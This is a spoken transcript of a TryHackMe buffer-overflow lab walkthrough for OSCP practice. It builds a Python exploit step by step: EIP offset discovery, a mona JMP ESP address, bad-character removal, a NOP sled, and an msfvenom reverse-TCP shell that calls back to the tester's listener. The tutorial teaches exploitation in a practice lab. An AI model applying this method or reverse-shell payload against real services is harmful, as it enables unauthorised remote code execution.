Hi there everybody, my name is Ali and today we are doing buffer overflow preparation room from TryHackMe created by Tiberius, which is an amazing room and contains everything which is required if you are going for any certification exam like OSCP or ECPPD. And I will make it as easy as possible for you to solve buffer overflow exploits and writing them in Python. So that being said, let's jump in. I already have started my machine and my IP address is 10.10.56.85. So what we need to do is I will not follow the complete guide right now here because I think so it is a little bit difficult for you as a beginner. But right now we need one Windows VM for this sort of exploits because we need a debugger called Immunity Debugger. Now we can use some other debuggers as well which are for Linux as well. So hopefully I will make another video because if you don't want to use Windows VM, so you can use Linux as well. But right now in this video I will be going to use Windows machine, and right now this room provides us a Windows machine and it is extremely similar to exams like OSCP. So what I will do right now here is that my machine is started and I will use xfree and I will copy the same command which they have provided, and I will use a special flag as well which is work area. So work area means that it will give me the full screen access of the Windows machine and it makes it much more easier to work with. So I will simply paste this command right here and let's hit enter and let's see whether we have access to the VM machine or not. Now normally if you are going for any certification exam, they will provide you this virtual machine. You can also use with your own virtual machine, install Windows on it, but right now you will be provided this virtual machine. Now you can see my virtual machine is up, and right onto the desktop I am having two things which are of interesting. The first one is Immunity Debugger right here which we will use, and the second one is the vulnerable application folder, and right here in this one the one which I will be going to do is OSCP, and in OSCP this is the executable which I will be going to start. Now first of all let me show you that there are in this room there are total 11 tasks. I will be going to show you only one task which is task number 2, and the function name or command name is overflow 1, and every task is extremely similar and I will go in deep detail for this task only, and hopefully you will be able to do every other task by yourself. So let's come back to our Windows machine and let's see what is this OSCP executable doing. So I will just double click this one, open this one, and it says that I am listening on port 1337 and waiting for client connections. So from this I can say that this executable is listening on port 1337. So I don't need to do nmap scan right now because I know that port 1337 is open and this vulnerable application is listening on that one. So I will simply come to my terminal and let's move this one right into the new workspace, and let's come back here and I will open a new terminal. Let me navigate into my folder buffer overflow, and right here what I will do is I will just see that whether I can connect to that listening machine or not. So right now my IP address is like 10.10.56.85. So what I will do is I will use netcat for this purpose. So I will do netcat -v for verbosity, and then I will specify 10.10.56.85, and I will say that that vulnerable application is listening on port 1337. Hit enter, and right away it says that welcome to OSCP vulnerable server, enter help for help. But right now if I come to my Windows machine, you can see that I have a connection here which says received a client connection from 1017.41.9, which is my local IP address. So now I know that I can communicate with this machine, I can communicate with this application. So let's see what actually it is doing. So it says enter help for help, so I will do help, hit enter, and it says valid commands, and in valid commands it says overflow 1, overflow 2, 3 and up till 10, and we need to specify any value over to these overflow commands. So let's say if I do overflow 1, type in a space and let's enter anything random. So if I do like test 1 2 3, hit enter, and it says overflow complete. So it works fine. Let's come back to the Windows machine and let's see if anything strange happens. No, everything is fine. So what if I specify anything which is much more greater than this test123? Now, because I am dealing with buffer overflow exploits, so buffer overflow, as the name suggests, we will be going to overflow the buffer, which means that if I enter a huge amount of data, so might be possible that this application might get crashed. So I will now check that one. So let's try again, overflow 1 space, and this time I will enter a huge amount of data, and to capture a huge amount of data, what I will use is Python, because it makes much more easier. Now Kali Linux comes pre-installed with Python, so I will do simply Python here, and now I will be in the Python interpreter. So I will use a very basic command just for the beginners. I will say that please print character A, and I will print this character A 1000 times. So what it will do, it will print out A character 1000 times like this. I will copy all of these A characters. I will come here and in overflow 1, I will paste all of these. Let's hit enter and let's see what happens. And it again says that overflow 1 complete. Let's come back to our Windows machine. And right away nothing happens here as well, and my application is absolutely working fine. So let's come back again here. I will do one more time, overflow 1, and this time I will do the same command in Python, and this time let's do 2000 times. So 2000 is, copy all of these, come back here, paste in the command, hit enter, and this time you can see that now I am having no message of overflow 1 complete, and I am having nothing here. So let's come back to the Windows machine, and right here you can see that now it says that oscp.exe has stopped working, and you can check online or close the program. So now what actually happened is that there is a buffer overflow vulnerability, because we have successfully crashed the program. Now normally in some cases you will receive an error called segmentation fault. So segmentation fault means that you are trying to access that part in the memory which you are not allowed to access it. So you get a segmentation fault error, and whenever you get that sort of error, it means that there is a buffer overflow vulnerability. Now I will use some sort of like Python script, and I am not a developer. Basically I know coding but not too much in advance, so I will make it as easy as possible. But if I come to this TryHackMe room, and if I click on this one or this task 2, you will be going to see some scripts here for fuzzing, some other scripts of crashing, controlling EIP. You can use this one. I will not use this one because I will make it as easy as possible and as simple, which I used in my certification exams like OSCP, and I got passed. So now let's come back to our terminal. I know that when I entered 2000 A's, the service got crashed. So now I will simply control C this one, clear the screen, and now I will write a Python script. So I will do like sublime. So let's do script.py for Python, and I will write the script in Python 3. So first of all, we need to specify that what we need to do. So first of all, I will say that this is a Python 3 script. So for that we use a hash sign, exclamation mark, and then we specify user bin env and then Python 3. So this will let the compiler or interpreter know that this is a Python 3 code, and then I will import two modules. One of them will be socket, just to communicate with the machine. So I will do import socket. Then I will import one more module. By the way, you can not import this one. It will be absolutely fine without this module, but I like to import this one. So I will do import sys as well. And the reason why I am importing sys is I will let you know in a few minutes. Then what I will do is I need to write a script. So I need to communicate with this machine. So first of all, let's close this program. Let's restart it. and now I need to communicate with this machine, and the IP address of this machine is 10.10.56.85, and the port which is open is 1337. So I will come back here and I will create a socket. So socket is used for connecting with the machine, so you can say. So for that purpose, what I will do is s equals to, and I will say socket dot socket like this, and this will create a socket, and then I will use s and with various sort of functions like connect, send or close, and we will use this sort of thing. So I will do first of all connection. So to connect, I will do s dot connect function, and this function receives a tuple. So tuple means that in round brackets we need to specify whatever we need to do. So I need to connect to the IP address and that port. So first of all, I will specify the IP address in double quotations, which is 10.10.56.85, and then after that I will add a comma, and after that I will specify the port, which is 1337. So like this. Now this will make a connection, and then I will get the response back from the Windows machine as well. So I will do s dot receive, and in receive I will pass on 1024 bytes. After this, connection will get established with my virtual machine, and I will show you just in a few minutes after running this Python script. But let's make some more boilerplate so that we can easily do our exploitation part. So for that purpose, now after making a connection, I will use one payload, or I will basically create a payload. So first of all, let's create a payload variable, and I will not do anything to this one right now. So let's move down, and then I will send this payload to the server or to the machine. So what I will do is s dot send, and I will send this payload. Right now I have not done anything to this payload, so don't worry at all. We will make the complete payload and enter that payload in this one variable. So right now I have not done anything yet, so I'm just making a boilerplate. And after sending the payload, I will simply close the connection. So s.close, and my connection has been closed. So up till now I have not done anything yet. I have just created a connection, made a payload variable which is empty right now, send that payload and close the connection. Now this is what we want right now, but again we can do some more stuff as well. So what I like to do is, again keeping it very simple, what I will do is I will say that if my connection gets failed, I mean if this connection gets failed or there is some sort of error, syntax error or any error, please give me the error message. So for that purpose I will use try and except. So I will do try colon, and I will say that please try this all stuff. So I will do a tab so that it comes below the try, and then I will do that if it fails, so I will do accept, and if that fails, that so please do, let's say, print, and print an error message that, let's say, cannot connect to the server. So in this case, it will give me an error message that no, I cannot connect to the server, please check again. And then I will do exit function of system. So that's why I imported the sys module. So now this is the complete boilerplate or the template which I will be going to use as easy as possible, making the connection, sending the payload, and then closing the connection. So first of all, now I showed you that I sent 2000 A's. So let's do that in this script. Now first of all, we need to do payload equals to, and what I like to do is I like to use a list here. So in Python we use list with square brackets. So what I will do right here is I will add a list and I will send a character 2000 times. So like this. Now the problem here is that this is Python 3, so we need to send everything which is strings or other stuff in bytes. So that's why I need to specify b before everything which I do. So I did a, so I will specify B, and it means that it will now send in bytes. So let's see whether this works or not. So if I come to my terminal, I will change the mode, or let's do Python 3 script.py. But before running the script, or let's run the script. So before opening the Immunity Debugger, so I will do Python 3 script.py, hit enter, and right now I get an error message of cannot connect to the server, and this is the mistake which I always make, and hopefully you will be going to make this mistake as well. And why we are making this mistake, that if I show you netcat -v for verbosity 10.10.56.85 1337, hit enter, and if I do help, you can see right here that I need to specify my A's or whatever I specify before or after, sorry, after overflow 1 and a space. And right here, if you see my script, I am directly sending 2000 A's, and I am nowhere specifying that you need to specify these all A's after overflow 1. So this is the biggest mistake which I made in my OSCP exam as well. So I was nervous, I was confused, so that's why I made this mistake. So make sure you never make these sort of mistakes, especially the space as well. So if I show you, now I need to send this in bytes, because you know Python 3 we need to send strings in bytes. So I will do bytes of, or let's use single quotation for bytes. So then I will specify bytes, overflow in capital cases 1, and don't forget to add a space right here, otherwise it will not work as well. And then I will add a plus sign, because in Python we use plus sign to concatenate both of the strings. Now still there is one more thing which I need to do. You can see right here I have added one thing here which is overflow 1, then I have added another thing which is bytes of a character 2000 time. So now these are two things in the list, so I need to join both of these. So I will use a join function, and I will simply do payload equals to, and I will join all of these into bytes, and then I will do join function, and I will join whatever is in this list, and I will join it into byte string, so that now everything will get joined and sent to the virtual machine, which is Windows, in bytes. So hopefully this will make sense now. And let's come back to our terminal, control C this one. Let's see, yes, so it is it says connection closing, I think. So let's restart this one. Okay, so let's come to our terminal, and if I do Python 3 and script.py, hit enter, and still I am having cannot connect to the server. So let's come back here and let's see what is the problem. So I am doing everything right here. s.connect. Okay, so I think so I am having a mistake here in my typo. So I am using payload wrong here. So I will do OAD, save this one now. Let's come to our terminal and let's try to run this one more time. Hit enter, and now it works absolutely fine. So let's come back to our Windows machine, and right here you can see that now my executable has been crashed. So now this is good, my script is ready, everything is absolutely working fine, and I am able to crash my application. Now from here I will use Immunity Debugger, because now I need to figure out some registers and some other things, and I want to place with some stuff so that I can get a reverse shell from this machine. So first of all, when you will start Immunity Debugger, you will see 4 panes here. Right one, which is right at the top left, it will be for assembly and disassembly. Right in the left one, which will be registers, there will be in the bottom right one, it will be stack, and the bottom left one, it will be hexadecimal dump. So what you need to do is you need to click on file, and there are 2 ways that you can use that executable. One of them is by open, which is F3 on shortcut key on keyboard, and attach. Now I like to use is open, because if you made anything wrong or if you need to restart it, you don't need to go back there, restart the Immunity Debugger. We can only restart the application. So that's why I always like to open that executable. So I will go to my desktop, vulnerable apps, OSCP, and this executable. So if I click on open, now you will see a lot of things right here, and the center and the font size is quite slow. So I think so to increase the font size, we use options, I believe, appearance, and right here in fonts, I will be going to change, and I will set the size to, let's say, 12. So if I click on OK, yes, so now you will be able to see all of that stuff. That's fine. Let's click on OK again, and now right here I am having nothing. But if I show you my terminal right here, you can see my OSCP executable right now is not yet started, and right in Immunity Debugger right at the bottom you can see it is in yellow color and it is paused. Now to run this executable, we can click on debug and click on run, but I will use shortcut keys from now on, which is F9. Now my apologies, my machine just got crashed, so I need to restart my machine, and now my IP address is 10.10.252.27 and I am still right here. So I changed my script as well and I added 10.10.252.27 right here as well. So now again I will now click on F9 to run this machine because this is paused, so I will do F9. And right here now it is running. So if I show you my control panel, you can see right here now it is working as fine. So listening on port 1337. So let's come back here. Now I will run my script and I will do python 3 script.py, hit enter, and right away let's come back to our Windows machine. And now you can see in my Immunity Debugger I am having paused right at the bottom right here, and in the left bottom it says access violation when executing 41, 41, 41 and 41. Now what 41 is? 41 is the hexadecimal representation of character A, and right here you can see the most important pointer is instruction pointer, which is EIP, and it is overwritten by 41. So 41, 41, 41 and 41. And in EAX my A's are coming and overflow 1 is coming right here, and in ESP my rest of the A's are coming. So now what I need to do is I need to gain complete control over EIP. And if you don't know what EIP is, it is an instruction pointer, and what it does is it will try to execute the next line of code which it finds. So for example, there are some lines of code, it will find the next line which comes and it will try to execute that code. So the problem is I need to gain control over EIP, and I need to find the exact index or offset of this EIP so that I can take complete control over to this one and then move on. But the problem is when I have sent 2000 A's, there is no way that I can figure out at what point EIP is starting, whether it is 1500 or 1600 or 1700 or any random number, I don't know. But I still know that when I sent 2000 A's, it got crashed and my A's are coming over EIP. So for this purpose, I will use a cyclic pattern. Now why cyclic pattern, you will get to know in one or few minutes, and it will make sense to you in few minutes. And so for that purpose we use MSF dash, and if I do tab 2 more times, so you can see we are having MSF pattern create and MSF pattern offset. So I will create a pattern of 2000 characters, not the one which I have did right now using Python. So what it will do is that pattern will come over to all of these, and my EIP will having that same pattern, and then from that pattern I will find out the EIP value, and then it will let me know that at what index EIP is starting. So this is the whole idea, and it will make sense in a few minutes. So if I do MSF dash pattern, create -h for help how to use this one, and it says we need to use -l for length, so I will just simply do -l and 2000 characters. So if I hit enter, now you can see I'm having the 2000 characters, but now there is some sort of pattern. So starting from AA0, AA1, AA2 and so on. So I will copy all of these, come to my Python script. I will remove 2000 A's from here, and in bytes I will paste all of those pattern, save. Let's come back here and restart Immunity Debugger. Now whenever you need to do any change or any other stuff, you need to restart Immunity Debugger. So to restart Immunity Debugger, you can come here to debug, click on restart, or I will press Ctrl F2 onto my keyboard. It will restart, still paused. I will do F9 to run this one. Let's come back to our terminal, run the Python script, hit enter, and if I come to my Windows machine, you can see it is paused and now access violation. But right now if you see my EIP, it is having 6F43396E, which means that now this is a unique number, and now I can find this number, find the offset, find the index where it is being overwritten on EIP. So in that complete pattern, I will find out where 6F43396E is, and for that purpose I will use another tool, which is MSF pattern offset. So I will do MSF dash pattern offset, and I will use -h for help how to use this one, and we need to specify the query as well. Now the query will be the query to locate, and what I will locate is this one, which is overwriting my EIP, because I need to find out at what place my EIP is being overwritten. So I will come back to my terminal and I will do the same thing, -l. The length is 2000 again, because these are 2000 characters in that pattern, and the query which we were able to overwrite to EIP was 6F43396E. So if I hit enter, and right away you can see it says that the exact match at offset 1978. So what does it means? That EIP is starting from 1978. So whatever we will specify after 1978 characters of A, or any random character or a random pattern, it will be overwritten over to EIP. So let's try this one. So I will come back to my script. Now I don't need this all. So I will remove this pattern and I will specify A, and A times 1978, and after that let's do plus, and this time I will specify character B, and I will specify it 4 times. So if everything is absolutely fine, my MSF pattern create and MSF pattern offset has gave me the correct result. Now my B character, which is I'm sending 4 times, should be overwritten to EIP. So let's save this one. Let's come back to our Immunity Debugger, Ctrl F2 to restart, F9 to run. It is running. Let's come back to our terminal, run that Python script again, hit enter, and let's come back to Windows machine, and right away you can see now my EIP is being overwritten by 42, 42, 42 and 42. So 42 is the hexadecimal representation of character B. Now I have gained control over to EIP completely. Whatever I specify over to EIP, I will have access to EIP. So now what I will do is, let's see one more thing. So I want to see what after I send B, where it goes. So if I do after B, if I send the C characters, so bytes of C, let's do 100 C characters, save this one. Let's restart the Immunity Debugger, Ctrl F2, F9, and let's come back to our terminal, run that script again, come to Windows machine, and right away you can see now that in my EIP I am having 42, which is B character. In my EAX I am having A, and in my ESP I am having the C character. So now this is extremely important because this is where I will go malicious. Now I told you that EIP is that it will see what is the next line of code which I want to run, so it is instruction pointer. But right away you can see I am having the control over ESP as well. So I sent 100 characters of C, and those 100 characters are going into ESP. So what if I jump this EIP, or I just tell this EIP that go to ESP. So what it will do is it will go to ESP, and if I place my malicious shell instead of C characters right here in ESP, so what it will do is, what EIP will do is EIP will come here to ESP and execute that my malicious shell. So this is the whole idea which I will be going after now. Because I have gained control over EIP, so I will jump it over to ESP and execute my malicious code. So let's start making our exploit much more on our way. So what I will do is, what we need to do right now is to jump that EIP. We need to use a tool, or you can say a Python script called Mona. Now I am using this TryHackMe virtual machine, so they have already installed it. But if you are using your own Windows machine, what you need to do is you need to come here and you need to search for Mona GitHub, and you need to click on the first repository. And right here you will be seeing a mona.python file, and what you can do is you can download this one, and you need to move that in your Immunity Debugger folder, which is py commands folder. So what you need to do is you need to go to your Windows machine. If I open File Explorer, my computer, C drive, and normally if it would have been Windows 10, there will be a folder of program files x86, but right now there is no folder like that one. So I will go into program files. We need to figure out where is Immunity Debugger installed. So right here you can see Immunity Inc., and in that Immunity Debugger, and in Immunity Debugger what you need to do is you need to open py commands folder, and right here you need to paste at mona.py. Now I told you that I would have already installed it right here, so here it is, Mona. So to do Mona, you need to right now copy that Python script right here in this current working directory. So now I already have done that one. Now this is the virtual machine from TryHackMe, so they have already done this one. So to invoke Mona, what I will do is I will do exclamation mark and Mona and hit enter, and now Mona will show up. So right now you can see that now we can use jump here. So the command which I will be going to use is jump, because I need to jump from EIP to ESP. So let's see what it says. So it says find pointers that will allow you to jump to a register, and where I need to jump over to ESP, because ESP is the place where my C characters are going, and I will place a malicious code right now there, and now jump it over there and execute the malicious code. So I will do Mona, and I will say jump command and the register -r for register, and I will do ESP because I want to jump over to ESP. Hit enter, and now you will see something very weird, that my Mona got disappeared. Now your command has been executed successfully. To see your command output again, just invoke Mona one more time and you will see Mona. But if I scroll a little bit upwards, you can see right here my Mona has been executed, and I am having the output of it as well. So now you are having 9 pointers, and you can choose any one of these pointers you want. I like to choose the one which is having all of the options as false. So ASLR false, rebase false, safe exceptional handler false, and OS false. So normally I will pick the first one. You can pick any one of these. Let's do by doing first one. Now the address of the first one is 625011AF. Now the problem here is again that when I will use this address, I need to convert it into a format called Little Endian. Now again, there are different modules in Python. There are a lot of ways to convert this in Little Endian format, but I will show you the easiest one which I can do. So now I know the address, so I will just simply click on view and remove Mona again. So I will click on CPU again. So show me the CPU, but before going anything further, let's do that one. So my address was 625011AF. Now we need to convert it into Little Endian. The easiest way to convert it into Little Endian format is just reverse it and place \x. So \x and reverse and start writing the characters from the reverse order and take 2 characters at a time. So from reverse order we are having 2 characters of AF, \x again, 2 characters are 11, \x again, 2 characters are 50, and \x again, and 62. So now this is converted into Little Endian format. So I will just simply copy this all, and now I will, instead of B, I will paste this here and I will remove 4 as well. Now again, just for your explanation why I am doing this one, because this is the jump address and I want to jump this one to my C buffer or ESP, where I will place the malicious code, and when it will jump over to my malicious code, it will get executed and I will get a reverse shell. So this is the whole idea. So first of all, let's confirm that whether this is absolutely right or not. So I will come back to our Windows machine, Control F2 to restart, F9 to run, and now I will set a breakpoint, because I will say that when 625011AF comes, just stop it right there. So for that purpose I need to set a breakpoint in this assembly and disassembly part here. So I will click here, Control G onto my keyboard, and I will specify 625011AF, hit enter. And right here at the top you can see I'm having jump ESP instruction, which is FFE4. So I will click on this one and F2 onto my keyboard, and right away you can see it is highlighted in some green blue color. So this means now breakpoint has been set. So now I will come back to my terminal, run this script again, hit enter, and I will come to Windows machine, and right away now my breakpoint it says right at the bottom, my program again paused. It says breakpoint at ESS func and .625011AF occurred. And now you can see my EIP is set to 625011AF, which is a jump instruction. Now where to jump? Jump over to ESP, and now I will make a malicious shell code, and I will now remove C's from here and I will paste my malicious code right here, and when it will jump over to that one, I will get a reverse shell. So to do that, there is still one problem which we need to face, and I will let you know what is that problem. But before going to that, let me make a malicious payload. So I will do msf venom -p for payload, windows shell _reverse _tcp. My local host is 10.17.41.9. My local port is, let's do 4444, and the format will be Python, and that's it, I think so. Let's hit enter and let's see. And right away you can see now I am having a shell code. It is giving me a buff variable and all of these are in bytes. But the problem here is that this shell code is having some characters which are not allowed to be used in that program, vulnerable application. And if any one of these characters is used, I will never get a reverse shell. So for example, there is a character here \x77. So might be possible that 77 will be not allowed in that program or not be used. So it will change this character into any random character, and then my payload will never ever work, because if my payload is changed, it will never get me a reverse shell. So these characters are called bad characters, and this is the last thing which we need to do after the jump address. We need to find out with what characters are bad characters, and we need to remove those bad characters from our payload. So to do that, what we need to do is we need to go to Google, and we need to first of all find what are the bad characters. So I'll do bad characters GitHub and hit enter, and right away I will click on the first link from the GitHub repository, and hopefully it will give me some bad characters, and it is giving me bad characters right here. But right now I need to see the Python format, and this is the Python format, and I will copy all of these and I will paste them in my Python script just below the importing modules. But right now these are not in bytes, so I need to add b before every one of these. So like this. Okay, now this is a variable bad character, so now I will remove this c from here and I will paste that variable. So bad characters, and now I will test for the bad characters, and if there is any character which is changed, that is a bad character. So now let's come to Immunity Debugger, control F2 to restart, F9 to run, and let's set a breakpoint, or let's do it without a breakpoint right now. So I will come to terminal, run the script again. Let's open RDP. It is paused again, access violation, and right now you can see I'm not having an ESP. So if I click on ESP, right click here, follow in dump. Now in the dump section, hexadecimal dump, you can see I am having my bad characters, all of these starting from 01, 02, and if I scroll up, you can see right now I'm having all 41s. Then I'm having my jump address which is AF115062, and then I'm having starting from 01, 02, 03, and so on. So starting from 01 are the original characters which I have sent, and if there is any change in the pattern of these characters, those will be the bad characters. So starting from 01, 02, 3, 4, 5, 6, and after 6 you can see there is something changed. It should be 07 and 08, but right now I'm seeing 0A and 0D. So it means that 07 and 08 are bad characters. So let me come to my Python script, and if I add one more comment just to remember my bad characters. So bad characters are again represented by \x and 07 and \x 08. So these two are the bad characters. How I found them? There was a change in the pattern. Let's see further on now. Now 09, 0A, B, C, D, E, F, 10, 11 up till 19 looks fine. 1A, B, C, D, E, F looks fine. Then 20 to 31 looks fine. No. So 20 to 28 and 29, 2A, 2B, 2C, 2D, and you can see after 2D it should have been 2E and 2F. But it is not 2E and 2F, so it means 2E and 2F are bad characters. So let's come back here, \x 2E, \x 2F. So now we found much more bad characters. So let's do one more stuff. Come back here and let's see. Now I hope you got how to find the bad character. So now I will move much more faster, because I need to find it until FFFF, or it is FF, I think so. So up till FF there are two more bad characters. So if I show you right here, right after 9E, 9F, I am having 0A and 0D. It should not have been 0A and 0D. It should have been A1, or not A1, it should have been A0 and A1 and then A2. So it means that A0 and A1, these two are the bad characters as well. So let's move them here as well. So \x, A0, \x, A1, these two are the bad characters as well. So let's come back here, and up till now there are further no bad characters. So one thing which we need to make sure is that 00 is also a bad character. Now you will not see that one in the dump, but it is always a bad character. So I'll do \x00 as well, and you need to do this one always in your shell code, otherwise you will again not get a reverse shell. So now I have found these bad characters. So what I will do, I will come to my terminal, and now I will use the same command to create the payload, and this time I will use -b, and I will say that I don't want these characters into my shell code. So if I hit enter now, and hopefully it will give me the Python shell code, and that will be having all characters except these ones. And now my payload has been created, and now you will see that there will be no 00 or the ones which I have pasted right here. So now I will simply copy all of these from here, come to my Sublime text. I will remove these bad characters because I don't want these anymore. I have found my bad characters, and now I will add my Python payload right here, and you can see right now it is in a proper format in bytes, and variable is buff. So I will just simply add buff right here. So buf buff. My payload has been created, the jump address is absolutely fine, and now everything is fine. Now I am ready to go, but right now I need to add one last thing which is very important, otherwise still I will not get a reverse shell, and that is NOP SLED. Now what it is actually is that in between jump and the payload, now I know that my EIP will jump over to my buff payload, which is a reverse shell, and I will get a reverse shell. But before that, in between these two, I need some sort of space, I need some sort of padding, otherwise it will never ever work. So that is called NOP SLED, and it is called x90. So I will send some bytes of x90, so \x90, and I will send, let's say, 16 or 8. You can send 8, 16, 24, 32, it depends upon you. I like to send 16 x90s just for the spaces. So now I think so my shell code is ready, and everything looks absolutely fine. If there would have been any problem, I will see, and let's see how it goes on. So now I don't need Immunity Debugger anymore. I have found my bad characters, I have found the jump address. I will close now Immunity Debugger, and now I will open this OSCP vulnerable application. Without Immunity Debugger, it is listening. Let's come back to our Python script, save this one. Let's come back to our terminal, and now I need to start my netcat listener first of all. So I will do netcat-nvlp on port 4444, and now right here I will run my Python script. So python 3 script.py, and hoping for the best. If everything is fine, I should get a reverse shell. So let's hit enter, and right away you can see I am having a reverse shell. And if I type in who am I am admin on OSCP buffer overflow preparation room. So this is how we create a Python script, and we ran it against our vulnerable application. We find everything, and we got a reverse shell. So yeah, so this was the script, and I tried to make it as easy as possible. There are a lot of scripts on GitHub. If you will copy them, they are very difficult to understand. So I tried my best, and I used this same script in my certification exams, and I passed. So that's why you can use this one, and this will be for everything. So let's come back to our TryHackMe room, and you can see right here I am having 11 tasks, and if you follow my same scripts, my same methodology, you will be able to do every task without any problem at all, and hopefully this will work for your exams as well. So this was it for this video, I think so, and if you liked it, please subscribe and like, and I will see you in the next video. Take care, bye.